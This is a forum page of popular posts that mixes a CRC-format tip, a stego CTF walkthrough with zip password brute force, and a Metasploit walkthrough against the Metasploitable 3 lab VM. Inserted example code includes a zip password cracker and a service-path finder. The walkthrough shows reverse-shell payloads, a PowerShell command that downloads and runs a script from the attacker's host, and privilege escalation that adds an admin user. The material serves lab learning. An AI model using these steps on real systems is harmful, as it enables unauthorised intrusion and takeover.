
Leaderboard

Popular Content

Showing content with the highest reputation on 12/20/17 in all areas

  1. Hi. I found out how the hash is computed:
     - type CRC16_AUG_CCITT (polynomial 0x1021, init value 0x1D0F, final XOR value 0x00)
     - it is computed over the whole area minus the last two bytes (16+16+14)
     - the computed CRC has to be reversed (LSB MSB)
     Merry Christmas. //swimm3r
    2 points
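Added example (not part of the post above, and not swimm3r's code): the CRC-16/AUG-CCITT parameters the post lists, run over everything except the last two bytes, with "reversed (LSB MSB)" taken to mean the CRC is stored little-endian (that reading is an assumption). The 46-byte payload (16+16+14) is constructed filler, not real data.

```python
# CRC-16/AUG-CCITT: poly 0x1021, init 0x1D0F, xorout 0x0000, no bit reflection.
# Added example; the blob layout (payload + CRC stored LSB first) is assumed
# from the post's wording.


def crc16_aug_ccitt(data: bytes) -> int:
    """Bitwise MSB-first CRC-16 with the AUG-CCITT parameters."""
    crc = 0x1D0F
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if crc & 0x8000 else (crc << 1)
            crc &= 0xFFFF
    return crc


def stored_crc(blob: bytes) -> int:
    """The trailing two bytes, read LSB first ("reversed" relative to the computed value)."""
    return int.from_bytes(blob[-2:], "little")


def append_crc(payload: bytes) -> bytes:
    """Build a blob in the described layout: payload, then CRC as LSB, MSB."""
    return payload + crc16_aug_ccitt(payload).to_bytes(2, "little")


def verify_blob(blob: bytes) -> bool:
    """Recompute over everything but the last two bytes and compare with what is stored."""
    return len(blob) >= 3 and crc16_aug_ccitt(blob[:-2]) == stored_crc(blob)


# Constructed sample: 16 + 16 + 14 = 46 bytes of payload, then the 2 CRC bytes.
SAMPLE_PAYLOAD = bytes(range(16)) + b"\xaa" * 16 + b"\x55" * 14
SAMPLE_BLOB = append_crc(SAMPLE_PAYLOAD)

if __name__ == "__main__":
    # Catalogue check value for this CRC variant over "123456789" is 0xE5CC.
    print(hex(crc16_aug_ccitt(b"123456789")))
    print(SAMPLE_BLOB[-2:].hex(), verify_blob(SAMPLE_BLOB))
```

If a candidate parameter set is in doubt, the quickest sanity check is the standard "123456789" test string: AUG-CCITT gives 0xE5CC, while the more common CCITT-FALSE (init 0xFFFF) gives 0x29B1, so a wrong init value shows up immediately.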
  2. For anyone interested, there is Data.gov.ro, from where you can download CSV lists of companies and their related information; the lists are updated once every 3 months http://data.gov.ro/organization/onrc
    1 point
  3. Learn programming and devops in a live environment anytime, anywhere. A Beginner's Guide to LabEx: If you are interested in programming but don't know where and how to get started, this course will show you the basic computer-related knowledge and how you can utilize LabEx's live environment to excel in IT by doing real practice. Start Lab. Linux Tutorial: LabEx's experimental environment is based on Linux. If you are familiar with Linux then you can skip this tutorial and start exploring LabEx right away. If Linux sounds new to you, please follow every step in this tutorial. This course covers all the basic concepts you need to know. Start Lab. Scrapy Tutorial: Web Scraping LabEx and Github: Scrapy uses an open source scraper framework implemented in Python. With the principle of "Do not Repeat Yourself", Scrapy provides a set of solutions for preparing the basic framework for scrapers and writing common problems in the process. This course will use LabEx and Github as examples to demonstrate how to complete a series of actions and commands. Start Lab. More Courses. Source: https://labex.io/
    1 point
  4. You can start helping yourself by searching the forum for the archives of C++/Java tutorials; there are some in Romanian too. What more do you want?
    1 point
  5. Hi, thank you for the reports; the mistakes are my fault and we will be more careful in the future. I corrected it as soon as I saw the flagged error; indeed it should have been 2 billion there, not 2 million.
    1 point
  6. Walkthrough: done on Lubuntu 17.04

     1. Download the image and check that it is intact (I think I downloaded it three times before I got the right one; the other times I only got the thumbnail), so this step is quite important.

        $ md5sum crack_me.jpg
        c720e708ab375e531bb77dca9dd08d38  crack_me.jpg   # so it's OK

     2. As we can see, the image shows a padlock with three wheels. We open it in a hex editor and look for anything besides the image. We check whether there is anything after the bytes FF D9:

        PK sa_nu_uitam.jpg

        We notice that after the JPEG end bytes come the initials PK, which means we have a zip archive (the initials of Phil Katz, the creator of the zip format). In the archive we see there is another picture, "sa_nu_uitam.jpg".

     3. We try to extract it, but it asks for a password; we go back to the original picture and wait for an idea. The first idea is to generate all the possible codes for that padlock. I used C++ for this (I work in it and it was easier for me):

```cpp
#include <iostream>
using namespace std;

int main() {
    char digits[] = "0123456789";
    char pass[4];
    pass[3] = 0;                           // NUL terminator so pass prints as a string
    for (int i = 0; i < 10; i++) {         // first wheel
        pass[0] = digits[i];
        for (int j = 0; j < 10; j++) {     // second wheel
            pass[1] = digits[j];
            for (int z = 0; z < 10; z++) { // third wheel
                pass[2] = digits[z];
                cout << pass << endl;      // one candidate per line: 000 .. 999
            }
        }
    }
    return 0;
}
```

        We compile it and, when we run it, redirect its output to a file:

        $ g++ main.cpp -o executabil
        $ ./executabil >> fisier.txt

        It can be done in any language; here is something in Python too: https://stackoverflow.com/questions/22214949/generate-numbers-with-3-digits

     4. After generating all the numbers it's time to move on to brute force. I used fcrackzip + renamed the image to crack_me.zip (I changed the extension because fcrackzip was complaining):

        $ fcrackzip -D -p fisier.txt -u crack_me.zip

     5. We get the confirmation that the password is: "PASSWORD FOUND!!!!: pw == 099". We extract and obtain a new image.

     6. We repeat step two and notice that this image is also a password-protected archive.
        The first idea that came to mind was to try the coordinates of the planes' noses (those who have played "avioane" know that if you hit the nose, the plane is lost). So I took them in order: the grey plane, the blue one and the orange one -> c2c8j5. That's the password.

     7. We get a text file "acum_e_acum.txt" with several words, each on its own line. At first I tried a Caesar cipher, but without any result. After asking for a hint, I was told to count the letters on each line. So we have:

        dovgdu 6 -> F
        pjcdr 5 -> E
        ajiugjstkxry 12 -> L
        clftccpcg 9 -> I
        olq 3 -> C
        zwwmyilka 9 -> I
        coegapicpfqhtjwxiprt 20 -> T
        d 1 -> A
        ezvqoxbhdrggdltfzr 18 -> R
        nsvpmsrtl 9 -> I
        zmjjb 5 -> E
        psrogemhpdduvpkyysa 19 -> S
        bempylhommfwajaopcos 20 -> T
        ejrqtuiue 9 -> I
        gxmcofanboqqwquytlisa 21 -> U
        qbeghlfbifyojk 14 -> N
        byvalibtihrzicglnt 18 -> R
        shrfviuhdgpqgsk 15 -> O
        gxcvsgqsukvus 13 -> M
        c 1 -> A
        zkojuvlclzwuho 14 -> N
        k 1 -> A
        xigc 4 -> D
        lcgbe 5 -> E
        xjtgreivdirdsgdjtkjtgq 22 -> V
        n 1 -> A
        xkjkbccuajcpstgmve 18 -> R
        g 1 -> A
        mekjwwobjoywwbuhaypt 20 -> T

        After counting the letters of each word, I replaced the letter count with the letter of the alphabet at that position. So I obtained: FELICITARI ESTI UN ROMAN ADEVARAT ("Congratulations, you are a true Romanian").

     Other challenges: [Easy] The big fat panda and The Eye of ...
     Thanks @Usr6
    1 point
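Added example (not part of the walkthrough above and not the poster's code): the three mechanical steps of the solve in one Python file: carving the zip that follows the JPEG EOI marker, generating the 000..999 word list, and the dictionary attack itself against the traditional PKWARE ("ZipCrypto") stream cipher, which is what fcrackzip's -p mode attacks. Python's zipfile cannot write encrypted entries, so the cipher is reimplemented here and the sample "crack_me" bytes are a constructed JPEG skeleton with an encrypted entry appended; the zip container headers are left out. The word list for the last step is the one quoted in the post.

```python
import itertools
import string
import zlib
from typing import List, Optional

JPEG_EOI = b"\xff\xd9"            # JPEG end-of-image marker
ZIP_LOCAL_HEADER = b"PK\x03\x04"  # zip local file header ("PK" = Phil Katz)


def find_trailing_zip(data: bytes) -> Optional[int]:
    """Offset of a zip local file header that follows the JPEG EOI marker, else None."""
    eoi = data.find(JPEG_EOI, 2)  # skip the SOI marker at offset 0
    if eoi == -1:
        return None
    off = data.find(ZIP_LOCAL_HEADER, eoi + 2)
    return None if off == -1 else off


def three_digit_wordlist() -> List[str]:
    """Every setting of a three-wheel padlock: "000" .. "999"."""
    return ["".join(p) for p in itertools.product(string.digits, repeat=3)]


class ZipCrypto:
    """Traditional PKWARE stream cipher (the scheme fcrackzip attacks)."""
    def __init__(self, password: bytes):
        self.k = [0x12345678, 0x23456789, 0x34567890]
        for c in password:
            self._update(c)

    @staticmethod
    def _crc_step(key: int, byte: int) -> int:
        # one raw CRC-32 table step, i.e. zlib's crc32 without its pre/post inversion
        return zlib.crc32(bytes([byte]), key ^ 0xFFFFFFFF) ^ 0xFFFFFFFF

    def _update(self, c: int) -> None:
        k = self.k
        k[0] = self._crc_step(k[0], c)
        k[1] = ((k[1] + (k[0] & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        k[2] = self._crc_step(k[2], k[1] >> 24)

    def _keystream(self) -> int:
        t = (self.k[2] | 2) & 0xFFFF
        return ((t * (t ^ 1)) >> 8) & 0xFF

    def encrypt(self, plain: bytes) -> bytes:
        out = bytearray()
        for c in plain:
            out.append(c ^ self._keystream())
            self._update(c)  # keys advance on the plaintext byte
        return bytes(out)

    def decrypt(self, cipher: bytes) -> bytes:
        out = bytearray()
        for c in cipher:
            c ^= self._keystream()
            self._update(c)
            out.append(c)
        return bytes(out)


def make_encrypted_entry(password: bytes, plain: bytes) -> tuple:
    """Encrypted stream of a stored entry: 12-byte header whose last byte is the high
    byte of the plaintext CRC-32, then the data (a real zip uses 11 random bytes, not zeros)."""
    crc = zlib.crc32(plain) & 0xFFFFFFFF
    header = b"\x00" * 11 + bytes([crc >> 24])
    return ZipCrypto(password).encrypt(header + plain), crc


def crack_entry(stream: bytes, crc: int, wordlist) -> Optional[str]:
    """Dictionary attack: the header check byte rejects 255/256 of wrong passwords
    cheaply; a wrong candidate that passes it by chance is caught by the body CRC."""
    for pw in wordlist:
        z = ZipCrypto(pw.encode())
        if z.decrypt(stream[:12])[-1] != crc >> 24:
            continue
        if zlib.crc32(z.decrypt(stream[12:])) & 0xFFFFFFFF == crc:
            return pw
    return None


def decode_letter_counts(words: List[str]) -> str:
    """Replace each word by the alphabet letter at position len(word) (1 = A)."""
    return "".join(string.ascii_uppercase[len(w) - 1] for w in words)


# The words from acum_e_acum.txt as listed in the post.
WORDS = ("dovgdu pjcdr ajiugjstkxry clftccpcg olq zwwmyilka coegapicpfqhtjwxiprt d "
         "ezvqoxbhdrggdltfzr nsvpmsrtl zmjjb psrogemhpdduvpkyysa bempylhommfwajaopcos "
         "ejrqtuiue gxmcofanboqqwquytlisa qbeghlfbifyojk byvalibtihrzicglnt "
         "shrfviuhdgpqgsk gxcvsgqsukvus c zkojuvlclzwuho k xigc lcgbe "
         "xjtgreivdirdsgdjtkjtgq n xkjkbccuajcpstgmve g mekjwwobjoywwbuhaypt").split()

# Constructed stand-in for crack_me.jpg: JPEG skeleton, then an encrypted entry.
FAKE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 12 + JPEG_EOI
ENTRY, ENTRY_CRC = make_encrypted_entry(b"099", b"sa_nu_uitam")
CRACK_ME = FAKE_JPEG + ZIP_LOCAL_HEADER + ENTRY
```

Running `crack_entry(ENTRY, ENTRY_CRC, three_digit_wordlist())` returns "099", and `decode_letter_counts(WORDS)` gives the final message without spaces. The two-stage check matters in practice: a one-byte check value is exactly why a dictionary run occasionally reports a wrong "hit" on a single entry, and why the decompressed data (or its CRC) has to be verified before trusting it.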
  7. Read here. The article is fairly long. The source is visible.
    1 point
  8. Published on 5 Jul 2017. Ad-hoc session working on pivoted packets through Meterpreter. Not finished, more to do, but small chunks of progress.
    1 point
  9. Step by step Metasploit walkthrough

     Usually, the ultimate goal is to get a root shell on the target machine, meaning you have total control over that machine. I will demonstrate step by step how to obtain a root shell on the Metasploitable 3 virtual machine using Metasploit. You will see that hacking is not always straightforward and, more often than not, you need to start again or find alternative solutions. To start, I booted the freshly created Metasploitable 3 VM and logged in as the vagrant user. Let's go.

     Step 1: Reconnaissance

     Before actually hacking your way in, you need to find more information about your target. You have to find out the IP address, running services and possibly vulnerable services to choose your attack vector. Let's start with a simple netdiscover scan to find the IP address of our target. To do so, just type netdiscover in your terminal. I know 192.168.0.149 is my own address, so the IP address of my host should be 192.168.0.206.

     Note: as I wrote this blog post over a longer period, the IP address of the target machine used later in this post can vary between 192.168.0.205 and 192.168.0.206.

     Let's continue with an Nmap scan to find running services:

        nmap -sV 192.168.0.206

     We find an Apache web server running on port 8022. Let's look into that. Open Firefox and enter the IP address + the port: 192.168.0.205:8022. We see that Desktop Central 9 software is running on port 8022. A quick Google search tells us there is an exploit available! Bingo!

     Step 2: exploit a service to get a shell

     Now that we have identified a vulnerable service and an available exploit, it's time to exploit the machine. Start Metasploit by running msfconsole in the terminal or click the shortcut. You can find the path for the exploit we found above by entering:

        search ManageEngine

     After executing the search command, we find the ManageEngine Desktop Central 9 exploit we found via Google. To start using the exploit, type the path as highlighted in the previous screen. You can use tab for autocomplete.

        use exploit/windows/http/manageengine_connectionid_write

     Now the exploit is loaded. Personally, I always run show options to see which settings are available and which are required. We see 3 required settings here:
     - RHOST: the target address. This will be the IP address of our target host: 192.168.0.206
     - RPORT: the target port. During our Nmap port scan, we found the service running on 8022.
     - TARGETURI: the path for the Desktop Central software. Leave this at the standard setting.

     To set your own settings, you need to execute set SETTING value, e.g.:

        set RHOST 192.168.0.206
        set RPORT 8022

     Understanding the difference between the concepts vulnerability, payload and exploit is important. The payload is the actual code you wish to execute, whilst the exploit is a way to deliver the payload. A vulnerability is a weak spot in the system that allows the exploit to work. If you take the analogy of a rocket, the rocket is the exploit whilst the warhead is the payload, delivering the actual damage.

     Now that we have set up the exploit, we need to attach a payload to it. Usually, our payload spawns a reverse shell to us, allowing us to interact with the target system. This means we are going to execute specific code on the target machine that will set up a shell (command line) back to us. There are different shells that can be spawned when attacking a Windows machine, such as a Windows command line or a Windows PowerShell. A very interesting payload is the meterpreter one, because it is capable of so much more than simply spawning a shell.

     Meterpreter is an advanced multi-function payload that is superior to other payloads because, in contrast to other payloads that execute one command (such as adding a user or spawning a shell), meterpreter can be seen as an interactive shell allowing you to download/upload files, dump password hashes, spawn shells, install backdoors, escalate privileges and so on. Another significant advantage is that meterpreter fully resides in memory by using DLL injection into existing processes without touching the disk. Furthermore, it can migrate from one process to another to make detection very difficult. To carry out its tasks, it does not create other processes, which would easily be picked up by antivirus or intrusion detection systems. To attach a meterpreter payload to our exploit, use the following command:

        set payload windows/meterpreter/reverse_tcp

     If you run show options again now, you will see that the payload options are visible:
     - LHOST: the host where the meterpreter will connect back to. This will be the address of our own Kali VM, 192.168.0.241
     - LPORT: the port where the meterpreter will connect back to. Choose any available port you like or leave it on 4444.

     Set our listen address to our own address:

        set LHOST 192.168.0.241

     We're set to fire the exploit. Simply type:

        exploit

     As shown on the screenshot below, you see the exploit worked and the payload was activated and provided us with a meterpreter shell. To check our current privilege, type getuid. Unfortunately, we only have a lower-privilege shell. Because we only have a lower-privilege shell with limited access, to fully compromise the machine we will need to escalate our privileges. There are a number of options available, but always try the easy way first. Execute getsystem to have Meterpreter try a few tricks up its sleeve to attempt automated privilege escalation. Unfortunately, it didn't work this time. To spawn a local shell (in this case a Windows command line), just type shell.

     A very powerful Windows privilege escalation framework is PowerSploit, written in PowerShell. We downloaded and extracted the zip file on our Desktop into a folder PowerSploit. We will start a web server with PowerShell, so we can easily call the scripts via our meterpreter shell. Navigate to the unzipped folder and start a web server via the following command:

        python -m SimpleHTTPServer

     Let's return to our Meterpreter session. It is possible to spawn a PowerShell shell within Meterpreter, but it's far easier to load scripts such as PowerSploit if you immediately spawn a reverse PowerShell with the payload. To do so, we will exit the meterpreter session and add a PowerShell payload instead of a meterpreter payload to our exploit by entering the command below. Quickly check show options to verify that the listen address is still correct.

        set payload windows/powershell_reverse_tcp

     And we have a PowerShell session! You can ignore the Invoke-Expression errors. This is where it gets a bit more advanced. We cannot just download PowerSploit to our target system, as this will more than likely raise red flags with antivirus systems. To avoid this, we will directly download the script from the web server we just created and execute a PowerSploit script in memory without touching the disk. We are going to use PowerUp.ps1, which is a specially crafted PowerShell script that is part of the PowerSploit framework. To download the script into memory, execute the following command in PowerShell:

        IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.241:8000/Privesc/PowerUp.ps1")

     Next, we execute a function from the script called Invoke-AllChecks, which will check the target host for privilege escalation attack vectors. To make it easier to read, we will output the result to a file named allchecks.txt:

        Invoke-AllChecks | Out-File allchecks.txt

     To check out the results, open a new terminal, launch a new instance of Metasploit and get the meterpreter shell up again (we should have saved our previous session instead of terminating it). To do so, repeat the steps as you did last time but choose another listening port, as we are already using 4444 in our PowerShell session (see the left terminal window on the screenshot below). Now we have two shells running on the same target host, a PowerShell and a meterpreter shell. To download the allchecks.txt file, execute download allchecks.txt with meterpreter. Download a copy of the allchecks.txt here.

     As you can read in the allchecks.txt file, the script checks the target system for privilege escalation vulnerabilities such as unquoted service paths, hackable DLL locations, unattended install files, etc. Let's focus on these unquoted service paths and service executable and argument permissions. Basically, these are improperly configured service paths where custom commands can be added. As services are run by the system user, this would mean that our custom command is also executed as the system user. Nice! The catch, however, is that you also need improperly configured write access rights to these services to add your custom command. PowerSploit makes it easy for you and gives you the abuse functions you need to execute to exploit a possible vulnerability. For example, for abusing the service Jenkins, we would need to execute the following command: Install-ServiceBinary -Name 'jenkins'. Unfortunately, after executing all given commands, we were not able to abuse a function due to no write access rights. Maybe PowerSploit didn't catch all unquoted service paths. Let's check manually in our open meterpreter shell. First get a Windows command line by executing shell. Execute the following command:

        wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

     Using this method, we find 4 possibly vulnerable services. One of these services, OpenSSHd, was not in the PowerSploit list. Let's try to exploit this service. Attempt exploitation of the service OpenSSHd by executing the following command in PowerShell. We see that the PowerShell session closed immediately. With some luck, the command was installed anyway. According to the README of PowerSploit, when using the command below the user John with password Password123! should be added to the administrators group.

        Install-ServiceBinary -Name 'OpenSSHd'

     Let's try to restart the service with net stop OpenSSHd and net start OpenSSHd and see if our command kicks in. Unfortunately, we have no access to start or stop a service. I also quickly verified whether the user John was added, but no luck. There is another way to restart a service, and that's forcing a reboot of our target host. Let's run Nmap to see if the host is vulnerable to some attacks that force a reboot. We found the MS12-020 vulnerability (CVE-2012-0002). Type back in the Metasploit console where our PowerShell just closed down and follow the same procedure as last time: search for the exploit, configure the exploit and execute it. This exploit sends a sequence of specially crafted RDP packets to an affected system, causing it to crash and reboot. (Make sure to watch your Metasploitable 3 VM when launching this exploit.) Your active Windows command line shell will have died because of the reboot. When the machine is back online, simply type exploit again to reconnect to the meterpreter shell. Spawn a Windows command line by executing shell and check with net users whether our exploit worked. It worked! We have created a new user named John, which is part of the Administrators group. We know from the PowerSploit README that his password is Password123!. The next step is to actually log in with our new Administrator and get a root shell. Let's try the famous PSExec exploit with our new Administrator details. Another cool trick is spawning a remote desktop. It could be very useful for enumeration of the box or for disabling firewall (rules) if PSExec does not work.

     Source: https://www.zero-day.io/metasploitwalkthrough/
    1 point
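Added example (not part of the walkthrough above and not from the zero-day.io article or PowerSploit): the same filter the wmic | findstr chain applies, written as a parser so the result can be read programmatically, plus the list of paths Windows would try for each flagged service, which is what makes an unquoted path with spaces abusable. The input is constructed sample output in the shape of `wmic service get Name,PathName,StartMode /format:csv`; the service names and paths (OpenSSHd, jenkins, WIN-TARGET, ...) are made up for the demo and are not dumped from Metasploitable 3.

```python
import csv
import io
from typing import Dict, List

# Constructed sample in the shape of
# "wmic service get Name,PathName,StartMode /format:csv" (wmic emits Node first).
SAMPLE_WMIC_CSV = r'''Node,Name,PathName,StartMode
WIN-TARGET,OpenSSHd,C:\Program Files\OpenSSH\bin\cygrunsrv.exe,Auto
WIN-TARGET,jenkins,"""C:\Program Files\jenkins\jenkins.exe""",Auto
WIN-TARGET,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs,Auto
WIN-TARGET,SomeTool,C:\Program Files\Some Tool\svc.exe -config a.cfg,Manual
WIN-TARGET,Agent,C:\tools\agent.exe,Auto
'''


def executable_part(pathname: str) -> str:
    """The part of an unquoted PathName up to and including the .exe; arguments
    after it are not involved in the lookup."""
    i = pathname.lower().find(".exe")
    return pathname if i == -1 else pathname[: i + 4]


def hijack_candidates(exe_path: str) -> List[str]:
    """Lookups Windows performs, in order, for an unquoted path with spaces: each
    space-delimited prefix is tried (".exe" appended when it has no extension),
    so a writable earlier directory lets an attacker plant e.g. C:\\Program.exe."""
    parts = exe_path.split(" ")
    cands = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        last = prefix.rsplit("\\", 1)[-1]
        cands.append(prefix if "." in last else prefix + ".exe")
    return cands


def find_unquoted_auto_services(wmic_csv: str) -> Dict[str, List[str]]:
    """Mirror of the wmic | findstr chain: Auto start, outside C:\\Windows, and not
    quoted. Unlike findstr it also requires a space in the executable path itself,
    which is the condition that actually makes the service abusable."""
    found: Dict[str, List[str]] = {}
    for row in csv.DictReader(io.StringIO(wmic_csv)):
        path = row["PathName"].strip()
        if row["StartMode"].lower() != "auto":
            continue
        if path.startswith('"') or path.lower().startswith("c:\\windows\\"):
            continue
        exe = executable_part(path)
        if " " in exe:
            found[row["Name"]] = hijack_candidates(exe)
    return found


if __name__ == "__main__":
    for name, cands in find_unquoted_auto_services(SAMPLE_WMIC_CSV).items():
        print(name)
        for c in cands:
            print("   would try:", c)
```

On the sample, only OpenSSHd is flagged: jenkins is quoted, wuauserv lives under C:\Windows, SomeTool is Manual and Agent has no space in its path. A flagged service is a candidate, not a finding: as the walkthrough notes, you still need write access to one of the earlier directories (check with `icacls` on each candidate's parent folder) and a way to restart the service, which is exactly where the author got stuck before resorting to the MS12-020 reboot.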
  10. The Portable Executable (PE) format is a file format for executables, object code, DLLs, FON font files, and others used in 32-bit and 64-bit versions of Windows operating systems. The PE format is a data structure that encapsulates the information necessary for the Windows OS loader to manage the wrapped executable code. [1] It is called "portable" because you can use it between different versions of Windows OS, not among different distros (Linux/OSX). Hope you find it useful!

      - Detect it Easy
      - Exeinfo PE
      - ExplorerSuite
      - PEiD
      - PEStudio
      - Resource Hacker
      - FileAlyzer
      - PEBrowser
      - PEview
      - RunPE Detector

      [1]: Wikipedia
    1 point
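Added example (not part of the post above and not from any of the tools it lists): a walk through the headers the loader reads first, in the order the post describes them: the DOS stub's e_lfanew, the PE signature, the COFF header, the optional header (whose magic tells 32-bit from 64-bit), and the section table. It also pulls out the fields the listed tools surface when triaging a sample: machine type, entry point, image base, the DllCharacteristics mitigation bits (ASLR, DEP, CFG) and any section that is both writable and executable, a usual packer/self-modifying-code tell. The input is a minimal PE32+ header constructed in the block itself, not a real binary.

```python
import struct
from typing import Any, Dict

MACHINES = {0x014C: "i386", 0x8664: "x86-64", 0x01C4: "ARM Thumb-2", 0xAA64: "ARM64"}
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000
DLL_HIGH_ENTROPY_VA, DLL_DYNAMIC_BASE, DLL_NX_COMPAT, DLL_GUARD_CF = 0x0020, 0x0040, 0x0100, 0x4000
IMAGE_FILE_DLL = 0x2000


def parse_pe(data: bytes) -> Dict[str, Any]:
    """DOS header -> PE signature -> COFF header -> optional header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    machine, nsec, _ts, _sym, _nsym, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:        # PE32: 4-byte ImageBase after BaseOfData
        bits = 32
        (image_base,) = struct.unpack_from("<I", data, opt + 28)
    elif magic == 0x20B:      # PE32+: 8-byte ImageBase, no BaseOfData
        bits = 64
        (image_base,) = struct.unpack_from("<Q", data, opt + 24)
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (entry,) = struct.unpack_from("<I", data, opt + 16)      # AddressOfEntryPoint (RVA)
    (dll_chars,) = struct.unpack_from("<H", data, opt + 70)  # same offset for PE32 and PE32+
    sections, rwx = [], []
    for i in range(nsec):
        raw = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        name = raw[0].rstrip(b"\0").decode("ascii", "replace")
        _, vsize, va, rawsize, rawptr, _, _, _, _, flags = raw
        sections.append((name, va, vsize, rawptr, rawsize))
        if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
            rwx.append(name)
    return {
        "bits": bits, "machine": MACHINES.get(machine, hex(machine)),
        "entry_point": entry, "image_base": image_base, "is_dll": bool(chars & IMAGE_FILE_DLL),
        "aslr": bool(dll_chars & DLL_DYNAMIC_BASE), "dep": bool(dll_chars & DLL_NX_COMPAT),
        "cfg": bool(dll_chars & DLL_GUARD_CF), "sections": sections, "rwx_sections": rwx,
    }


def build_sample_pe64() -> bytes:
    """Constructed minimal PE32+ header: two sections, one of them RWX. Not loadable."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew -> right after the stub
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 240, 0x0022)  # x64, 2 sections, EXE
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                        # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x1000)                      # AddressOfEntryPoint
    struct.pack_into("<Q", opt, 24, 0x140000000)                 # ImageBase
    struct.pack_into("<H", opt, 68, 3)                           # Subsystem: console
    struct.pack_into("<H", opt, 70, DLL_HIGH_ENTROPY_VA | DLL_DYNAMIC_BASE | DLL_NX_COMPAT)
    text = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    packed = struct.pack("<8sIIIIIIHHI", b".packed", 0x1000, 0x2000, 0x1000, 0x600, 0, 0, 0, 0, 0xE0000040)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + text + packed


if __name__ == "__main__":
    info = parse_pe(build_sample_pe64())
    for key in ("bits", "machine", "entry_point", "image_base", "aslr", "dep", "cfg", "rwx_sections"):
        print(key, info[key])
```

The section table is where the "is this packed?" question usually starts: an entry point that falls outside `.text`, a section with virtual size far larger than its raw size, or a writable-and-executable section like the constructed `.packed` above are the same signals Detect It Easy and PEiD weigh before signature matching.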
  11. Useful, I like http://www.ntcore.com/exsuite.php
    1 point